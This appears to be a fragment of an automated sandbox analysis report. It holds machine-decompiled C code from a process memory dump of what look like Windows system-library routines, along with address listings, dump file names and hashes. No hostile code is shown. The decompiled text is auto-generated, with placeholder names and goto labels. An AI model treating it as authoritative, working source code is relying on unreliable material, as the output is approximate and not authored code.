						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E04F02280( *[fs:0x30], 0x4fd8550);
						_t139 =  *0x4fd7b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E04F1F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E04EFFFB0(_t193, _t235, 0x4fd8550);
								L5:
								return E04F3D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E04EE1C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x4fd7b9c; // 0x0
							_t235 = L04F04620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x4fd7b10; // 0x10
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E04F1A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E04EFFFB0(_t193, _t235, 0x4fd8550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L04F077F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L04F077F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x4fd7b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x4fd7b10; // 0x10
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E04F237C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x4fd7b9c; // 0x0
									_t214 = L04F04620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E04F237F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x4fd7b10 =  *0x4fd7b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x4fd7b04 =  *0x4fd7b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L04F077F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L04F077F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x4fd7b08 =  *0x4fd7b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E04F257C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E04F2F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L04F077F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E04F1A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L04F077F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E04F296C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































                                                                                                                                0x04ef849b
                                                                                                                                0x04ef849b
                                                                                                                                0x04ef849b
                                                                                                                                0x04ef849b
                                                                                                                                0x04ef849d
                                                                                                                                0x04ef84a2
                                                                                                                                0x04ef84a7
                                                                                                                                0x04ef84b1
                                                                                                                                0x04ef84d8
                                                                                                                                0x00000000
                                                                                                                                0x04ef84b3
                                                                                                                                0x04ef84c4
                                                                                                                                0x04ef84c9
                                                                                                                                0x04ef84cd
                                                                                                                                0x04ef84cf
                                                                                                                                0x04ef84cf
                                                                                                                                0x04ef84d6
                                                                                                                                0x04ef84e6
                                                                                                                                0x04ef84e9
                                                                                                                                0x04ef84ec
                                                                                                                                0x04ef84ef
                                                                                                                                0x04ef84f2
                                                                                                                                0x04ef84f4
                                                                                                                                0x04ef84fc
                                                                                                                                0x04ef8501
                                                                                                                                0x04ef8506
                                                                                                                                0x04ef8509
                                                                                                                                0x04ef86e0
                                                                                                                                0x04ef86e5
                                                                                                                                0x04ef86e8
                                                                                                                                0x04ef86ed
                                                                                                                                0x04ef86f0
                                                                                                                                0x04ef86f2
                                                                                                                                0x04f49afd
                                                                                                                                0x04f49b02
                                                                                                                                0x04ef84da
                                                                                                                                0x04ef84df
                                                                                                                                0x04ef84df
                                                                                                                                0x04ef86fa
                                                                                                                                0x04ef86fd
                                                                                                                                0x04ef86fe
                                                                                                                                0x04ef8701
                                                                                                                                0x04ef8706
                                                                                                                                0x04ef8709
                                                                                                                                0x04ef870b
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04ef8711
                                                                                                                                0x04ef8725
                                                                                                                                0x04ef8727
                                                                                                                                0x04ef872a
                                                                                                                                0x04ef872c
                                                                                                                                0x04f49af0
                                                                                                                                0x04f49af5
                                                                                                                                0x04ef8732
                                                                                                                                0x04ef8732
                                                                                                                                0x04ef8732
                                                                                                                                0x04ef8735
                                                                                                                                0x04ef8737
                                                                                                                                0x04ef8515
                                                                                                                                0x04ef8515
                                                                                                                                0x04ef8518
                                                                                                                                0x04ef851d
                                                                                                                                0x04ef8523
                                                                                                                                0x04ef8527
                                                                                                                                0x04ef852b
                                                                                                                                0x04ef8537
                                                                                                                                0x04ef8539
                                                                                                                                0x04ef853c
                                                                                                                                0x04ef853e
                                                                                                                                0x04ef868c
                                                                                                                                0x04ef8691
                                                                                                                                0x04ef8699
                                                                                                                                0x04ef869b
                                                                                                                                0x04ef8744
                                                                                                                                0x04ef8748
                                                                                                                                0x04ef86a1
                                                                                                                                0x04ef86a1
                                                                                                                                0x04ef86a1
                                                                                                                                0x04ef86a4
                                                                                                                                0x04ef86a8
                                                                                                                                0x04f49bdf
                                                                                                                                0x04f49bdf
                                                                                                                                0x04ef86ae
                                                                                                                                0x04ef86b0
                                                                                                                                0x00000000
                                                                                                                                0x04ef86b6
                                                                                                                                0x00000000
                                                                                                                                0x04f49be9
                                                                                                                                0x04ef86b0
                                                                                                                                0x04ef8544
                                                                                                                                0x04ef854a
                                                                                                                                0x04ef854d
                                                                                                                                0x04ef8551
                                                                                                                                0x04ef876e
                                                                                                                                0x04ef8778
                                                                                                                                0x04ef877b
                                                                                                                                0x04ef8780
                                                                                                                                0x04ef8557
                                                                                                                                0x04ef8557
                                                                                                                                0x04ef855d
                                                                                                                                0x04ef855d
                                                                                                                                0x04ef856b
                                                                                                                                0x04ef856e
                                                                                                                                0x04ef8570
                                                                                                                                0x04ef8573
                                                                                                                                0x04ef8576
                                                                                                                                0x04ef8576
                                                                                                                                0x04ef8579
                                                                                                                                0x04ef857b
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04ef8581
                                                                                                                                0x04ef85a0
                                                                                                                                0x04ef85a2
                                                                                                                                0x04ef85a5
                                                                                                                                0x04ef85a7
                                                                                                                                0x04f49b1b
                                                                                                                                0x04f49b1b
                                                                                                                                0x04ef862e
                                                                                                                                0x04ef862e
                                                                                                                                0x04ef8631
                                                                                                                                0x04ef8631
                                                                                                                                0x04ef8634
                                                                                                                                0x04ef8636
                                                                                                                                0x04ef8669
                                                                                                                                0x04ef8669
                                                                                                                                0x04ef866b
                                                                                                                                0x04f49bbf
                                                                                                                                0x04f49bc4
                                                                                                                                0x04f49bc8
                                                                                                                                0x04f49bce
                                                                                                                                0x04f49bce
                                                                                                                                0x04ef8671
                                                                                                                                0x04ef8671
                                                                                                                                0x04ef8674
                                                                                                                                0x04ef8676
                                                                                                                                0x04f49bae
                                                                                                                                0x04f49bae
                                                                                                                                0x04ef8676
                                                                                                                                0x04ef867c
                                                                                                                                0x04ef867e
                                                                                                                                0x04ef8688
                                                                                                                                0x04ef8688
                                                                                                                                0x00000000
                                                                                                                                0x04ef867e
                                                                                                                                0x04ef8638
                                                                                                                                0x04ef8638
                                                                                                                                0x04ef863b
                                                                                                                                0x04ef863e
                                                                                                                                0x04ef863f
                                                                                                                                0x04ef8642
                                                                                                                                0x04ef8645
                                                                                                                                0x04ef8648
                                                                                                                                0x04ef864d
                                                                                                                                0x04f49b69
                                                                                                                                0x04f49b6e
                                                                                                                                0x04f49b7b
                                                                                                                                0x04f49b81
                                                                                                                                0x04f49b85
                                                                                                                                0x04f49b89
                                                                                                                                0x04f49ba7
                                                                                                                                0x04f49b8b
                                                                                                                                0x04f49b91
                                                                                                                                0x04f49b9a
                                                                                                                                0x04f49b9f
                                                                                                                                0x04f49b9f
                                                                                                                                0x04ef8788
                                                                                                                                0x04ef878d
                                                                                                                                0x04ef8763
                                                                                                                                0x04ef8763
                                                                                                                                0x04ef8766
                                                                                                                                0x00000000
                                                                                                                                0x04ef8766
                                                                                                                                0x04f49b70
                                                                                                                                0x00000000
                                                                                                                                0x04f49b70
                                                                                                                                0x04ef8656
                                                                                                                                0x04ef865a
                                                                                                                                0x04ef865c
                                                                                                                                0x04ef8752
                                                                                                                                0x04ef8756
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04ef875e
                                                                                                                                0x00000000
                                                                                                                                0x04ef875e
                                                                                                                                0x04ef8662
                                                                                                                                0x04ef8662
                                                                                                                                0x04ef8662
                                                                                                                                0x04ef8666
                                                                                                                                0x00000000
                                                                                                                                0x04ef8666
                                                                                                                                0x04ef85b7
                                                                                                                                0x04ef85b9
                                                                                                                                0x04ef85bc
                                                                                                                                0x04ef85bf
                                                                                                                                0x04ef85cc
                                                                                                                                0x04ef85d1
                                                                                                                                0x04ef85d4
                                                                                                                                0x04ef85db
                                                                                                                                0x04ef85de
                                                                                                                                0x04ef85e0
                                                                                                                                0x04f49b5f
                                                                                                                                0x00000000
                                                                                                                                0x04f49b5f
                                                                                                                                0x04ef85e6
                                                                                                                                0x04ef85ea
                                                                                                                                0x04ef86c3
                                                                                                                                0x04ef86c5
                                                                                                                                0x04ef86c8
                                                                                                                                0x04ef86ca
                                                                                                                                0x04f49b16
                                                                                                                                0x00000000
                                                                                                                                0x04f49b16
                                                                                                                                0x04ef86d6
                                                                                                                                0x04ef85f6
                                                                                                                                0x04ef85f6
                                                                                                                                0x04ef85f9
                                                                                                                                0x04ef8602
                                                                                                                                0x04ef8606
                                                                                                                                0x04ef860a
                                                                                                                                0x04ef860b
                                                                                                                                0x04ef860e
                                                                                                                                0x04ef8611
                                                                                                                                0x00000000
                                                                                                                                0x04ef8611
                                                                                                                                0x04ef85f3
                                                                                                                                0x00000000
                                                                                                                                0x04ef85f3
                                                                                                                                0x04ef8619
                                                                                                                                0x04ef861e
                                                                                                                                0x04ef861e
                                                                                                                                0x04ef8621
                                                                                                                                0x04ef8622
                                                                                                                                0x04ef8623
                                                                                                                                0x04ef8625
                                                                                                                                0x04ef862c
                                                                                                                                0x00000000
                                                                                                                                0x04ef873d
                                                                                                                                0x00000000
                                                                                                                                0x04ef873d
                                                                                                                                0x04ef8737
                                                                                                                                0x04ef850f
                                                                                                                                0x04ef8512
                                                                                                                                0x00000000
                                                                                                                                0x04ef8512
                                                                                                                                0x00000000
                                                                                                                                0x04ef84d6

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4e206a090c751f5cd88942b469af7d74717b07b6a0a5e35d007cec34fb5a0553
                                                                                                                                • Instruction ID: 8bff0d9e92ae6aadb29fb86b6abda387976ab6facab05795022427aefb161240
                                                                                                                                • Opcode Fuzzy Hash: 4e206a090c751f5cd88942b469af7d74717b07b6a0a5e35d007cec34fb5a0553
                                                                                                                                • Instruction Fuzzy Hash: F0B12CB1F00249DFDB14EFA9CD84AAEBBB5FF84308F105529E505AB245EB70B946CB50
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F1513A, Relevance: .3, Instructions: 258COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 67%
                                                                                                                                			E04F1513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x4fdd360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E04F2D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E04F02280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L04F04620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E04F2F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E04EFFFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x4fdb1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E04F2B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                                                                                                                                0x04f15142
                                                                                                                                0x04f1514c
                                                                                                                                0x04f15150
                                                                                                                                0x04f15157
                                                                                                                                0x04f15159
                                                                                                                                0x04f1515e
                                                                                                                                0x04f15165
                                                                                                                                0x04f15169
                                                                                                                                0x04f1516c
                                                                                                                                0x04f15172
                                                                                                                                0x04f15176
                                                                                                                                0x04f1517a
                                                                                                                                0x04f1517a
                                                                                                                                0x04f1517a
                                                                                                                                0x04f1517f
                                                                                                                                0x04f56d8b
                                                                                                                                0x04f56d8e
                                                                                                                                0x04f56d91
                                                                                                                                0x04f56d95
                                                                                                                                0x04f56d98
                                                                                                                                0x04f56d9c
                                                                                                                                0x04f56da0
                                                                                                                                0x04f56da3
                                                                                                                                0x04f56da7
                                                                                                                                0x04f56e26
                                                                                                                                0x04f56e26
                                                                                                                                0x04f56e2a
                                                                                                                                0x04f151f9
                                                                                                                                0x04f151f9
                                                                                                                                0x04f151fe
                                                                                                                                0x04f56e33
                                                                                                                                0x04f56e33
                                                                                                                                0x04f56e39
                                                                                                                                0x04f56e3d
                                                                                                                                0x04f56e46
                                                                                                                                0x04f56e50
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f56e52
                                                                                                                                0x04f56e53
                                                                                                                                0x04f56e56
                                                                                                                                0x04f56e5d
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f56e5f
                                                                                                                                0x04f56e67
                                                                                                                                0x04f56e77
                                                                                                                                0x04f56e7f
                                                                                                                                0x04f56e80
                                                                                                                                0x04f56e88
                                                                                                                                0x04f56e90
                                                                                                                                0x04f56e9f
                                                                                                                                0x04f56ea5
                                                                                                                                0x04f56ea9
                                                                                                                                0x04f56eb1
                                                                                                                                0x04f56ebf
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f56ecf
                                                                                                                                0x04f56ed3
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f56edb
                                                                                                                                0x04f56ede
                                                                                                                                0x04f56ee1
                                                                                                                                0x04f56ee8
                                                                                                                                0x04f56eeb
                                                                                                                                0x04f56eed
                                                                                                                                0x04f56ef0
                                                                                                                                0x04f56ef4
                                                                                                                                0x04f56ef8
                                                                                                                                0x04f56efc
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f56f0d
                                                                                                                                0x04f56f11
                                                                                                                                0x04f56f32
                                                                                                                                0x04f56f37
                                                                                                                                0x04f56f3b
                                                                                                                                0x04f56f3e
                                                                                                                                0x04f56f41
                                                                                                                                0x04f56f46
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f56f4c
                                                                                                                                0x04f56f50
                                                                                                                                0x04f56f50
                                                                                                                                0x04f56f54
                                                                                                                                0x04f56f62
                                                                                                                                0x04f56f65
                                                                                                                                0x04f56f6d
                                                                                                                                0x04f56f7b
                                                                                                                                0x04f56f7b
                                                                                                                                0x04f56f93
                                                                                                                                0x04f56f98
                                                                                                                                0x04f56fa0
                                                                                                                                0x04f56fa6
                                                                                                                                0x04f56fb3
                                                                                                                                0x04f56fb6
                                                                                                                                0x04f56fbf
                                                                                                                                0x04f56fc1
                                                                                                                                0x04f56fd5
                                                                                                                                0x04f56fda
                                                                                                                                0x04f56fda
                                                                                                                                0x04f56fdd
                                                                                                                                0x04f56fe2
                                                                                                                                0x04f56fe7
                                                                                                                                0x04f56feb
                                                                                                                                0x04f56fef
                                                                                                                                0x04f56ff3
                                                                                                                                0x04f1520c
                                                                                                                                0x04f1520c
                                                                                                                                0x04f1520f
                                                                                                                                0x04f15215
                                                                                                                                0x04f15234
                                                                                                                                0x04f1523a
                                                                                                                                0x04f1523a
                                                                                                                                0x04f15244
                                                                                                                                0x04f15245
                                                                                                                                0x04f15246
                                                                                                                                0x04f15251
                                                                                                                                0x04f15251
                                                                                                                                0x04f56f13
                                                                                                                                0x04f56f17
                                                                                                                                0x04f56f17
                                                                                                                                0x04f56f18
                                                                                                                                0x04f56f1b
                                                                                                                                0x04f56f1f
                                                                                                                                0x04f56f23
                                                                                                                                0x00000000
                                                                                                                                0x04f56f28
                                                                                                                                0x04f15204
                                                                                                                                0x04f15204
                                                                                                                                0x04f15208
                                                                                                                                0x00000000
                                                                                                                                0x04f15208
                                                                                                                                0x04f15185
                                                                                                                                0x04f15188
                                                                                                                                0x04f1518a
                                                                                                                                0x04f1518e
                                                                                                                                0x04f15195
                                                                                                                                0x04f56db1
                                                                                                                                0x04f56db5
                                                                                                                                0x04f56db9
                                                                                                                                0x04f1519b
                                                                                                                                0x04f1519b
                                                                                                                                0x04f1519e
                                                                                                                                0x04f151a7
                                                                                                                                0x04f151a9
                                                                                                                                0x04f151a9
                                                                                                                                0x04f151b5
                                                                                                                                0x04f151b8
                                                                                                                                0x04f151bb
                                                                                                                                0x04f151be
                                                                                                                                0x04f151c1
                                                                                                                                0x04f151c5
                                                                                                                                0x04f151c9
                                                                                                                                0x04f151cd
                                                                                                                                0x04f151cd
                                                                                                                                0x04f151d8
                                                                                                                                0x04f151dc
                                                                                                                                0x04f151e0
                                                                                                                                0x04f56dcc
                                                                                                                                0x04f56dd0
                                                                                                                                0x04f56dd5
                                                                                                                                0x04f56ddd
                                                                                                                                0x04f56de1
                                                                                                                                0x04f56de1
                                                                                                                                0x04f56de5
                                                                                                                                0x04f56deb
                                                                                                                                0x04f56df1
